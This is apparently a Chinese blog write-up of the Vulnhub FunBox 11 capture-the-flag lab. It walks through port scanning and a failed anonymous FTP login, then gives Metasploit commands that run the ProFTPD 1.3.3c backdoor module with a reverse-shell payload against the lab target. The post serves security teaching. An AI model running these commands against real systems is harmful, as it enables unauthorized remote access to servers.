网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
渗透机:kali IP :172.16.5.107 靶机IP :172.16.5.4
ping
的通 环境搭建成功!
通过nmap
扫描发现开启了21,22
和25,80,139,143,445
端口 访问80
端口 简单dirb
扫描一下 发现是 Wordpress
需要添加 /etc/hosts funbox11
②:FTP匿名登入:
因为开启了 21
端口 可以尝试 ftp
匿名登入 登入失败 所以不行!!
③:漏洞发现:
通过刚刚的扫描发现FTP
版本号为1.3.3c
searchsploit
搜索本地漏洞库!
③:漏洞利用:
metasploit
执行漏洞 具体看下面代码!
use exploit/unix/ftp/proftpd_133c_backdoor #使用模块
show options #查看选项
set RHOSTS 172.16.5.4 #设置目标靶机
show payloads #查看 payload
set payload payload/cmd/unix/reverse #设置payload
show options
set LHOST 172.16.5.107 #设置本机ip
exploit
④:获取flag:
至此获取到了所有得flag,渗透测试结束。
Vulnhub靶机渗透总结:
FunBox
系列第十一个靶机了 也是最后一个比较简单
1.信息收集 获取ip地址 和端口信息
2.metasploit
的基本操作
3. 了解 ProFTPD 1.3.3c
后门命令执行漏洞
这是这个系列第十一个靶机啦 比较简单 希望对刚入门得小白有帮助! 至此这个系列更新完啦!🙂
最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
**
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!